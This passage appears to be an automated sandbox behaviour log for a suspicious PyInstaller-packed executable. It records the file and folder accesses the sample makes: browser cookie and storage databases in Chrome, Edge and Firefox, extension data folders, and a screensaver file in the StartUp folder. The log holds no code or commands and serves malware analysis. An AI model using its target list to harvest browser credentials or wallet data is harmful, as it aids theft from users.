              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\base_library.zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI73202\unicodedata.pyd VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\Desktop\KpHYfxnJs6.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Temp VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CommerceHeuristics VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AutoIt v3\Extras\AutoItX VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\de VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\eu VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fa VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fi VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fr VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\gu VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hi VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\OriginTrials VolumeInformation
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ko VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
